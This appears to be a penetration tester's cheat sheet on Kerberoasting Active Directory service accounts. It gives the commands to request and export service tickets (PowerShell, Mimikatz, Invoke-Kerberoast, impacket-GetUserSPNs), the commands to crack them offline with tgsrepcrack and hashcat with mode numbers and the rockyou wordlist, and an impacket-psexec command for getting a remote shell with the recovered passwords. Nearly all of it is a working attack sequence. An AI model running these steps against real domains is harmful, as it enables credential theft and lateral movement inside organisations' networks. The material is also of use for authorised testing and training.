Kerberoasting

Request a Kerberos service ticket (TGS) for a target SPN and crack it offline to recover the clear-text password of the service account. The ticket is encrypted with the password hash of the account the SPN is registered to (not with anything derived from the SPN string itself), which is why a weak service-account password falls to a wordlist attack.

No administrative privileges required: any authenticated domain user can request a TGS for any registered SPN.

Install the kerberoast package on Kali

sudo apt update && sudo apt install kerberoast

Manually

On Windows, open a command prompt, start PowerShell and request a service ticket for the target SPN. The KDC returns the ticket encrypted under the service account's key and Windows caches it locally; klist lists the cached tickets.

powershell
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList '<SPN>'
klist

Export the cached service ticket with Mimikatz (writes one .kirbi file per cached ticket into the current directory; pick the one for the target SPN).

mimikatz.exe "kerberos::list /export" exit

Or, using Invoke-Kerberoast (not tested). The script ships with PowerShell Empire on Kali at the path below; copy it to the Windows host and dot-source it in PowerShell. It requests and extracts the tickets in one step, already in hashcat format.

/usr/share/powershell-empire/empire/server/data/module_source/credentials/Invoke-Kerberoast.ps1
powershell
. .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat Hashcat

Get SPNs

On Kali

impacket-GetUserSPNs ${DOMAIN}/${USER} -outputfile SPNs.txt

💡 Seen in a demo.

From the tool's help, -request requests a TGS for each account with an SPN and prints them in JtR/hashcat format (default False):

impacket-GetUserSPNs -request ${DOMAIN}/${USER} > kerberoasting.txt

On Windows

cd impacket-master\examples
python GetUserSPNs.py <domain>/<username> -outputfile SPNs.txt

Extract the hash line for a specific SPN. SPNs.txt is text, one $krb5tgs$ line per ticket (not a .kirbi); the SPN appears inside the line, so a case-insensitive grep is enough.

grep -i <spn> SPNs.txt > <spn>.hash

Crack the tickets

Run tgsrepcrack.py (from the kerberoast package) against the .kirbi exported by Mimikatz, supplying a wordlist. It tries each word as the service account's password and prints the one that correctly decrypts the ticket.

WL=/home/kali/wl.txt
TICKET_FILE=<filename>.kirbi
python3 /usr/share/kerberoast/tgsrepcrack.py $WL $TICKET_FILE

Using Hashcat

HASH=<ticket>.hash      # text file with one or more $krb5tgs$ lines from GetUserSPNs
TYPE=13100              # etype 23 (RC4-HMAC); use 19600 for etype 17 and 19700 for etype 18 (AES)
WL=/usr/share/wordlists/rockyou.txt

hashcat -O -m $TYPE -a 0 $HASH $WL

-O selects the optimized kernels, which cap the candidate password length; drop it if the wordlist contains long passwords. Check the number after $krb5tgs$ in the file before choosing the mode: hashcat rejects lines whose etype does not match.

Hash format (etype 23, as written by impacket; ':' in the SPN is replaced by '~'):

$krb5tgs$23$*<USER>$<DOMAIN>$<SPN>*$<CHECKSUM>$<ENCRYPTED TICKET DATA>

When a hash is cracked, the account to use is the <USER> field of that hash line (or list domain users with net user /domain). Try the credentials with Impacket. impacket-psexec needs local administrator rights on the target, so a service account that lacks them will authenticate but not give a shell; in that case use the credentials with whatever the account can reach.

impacket-psexec ${DOMAIN}/${USER}:${PASS}@${IP}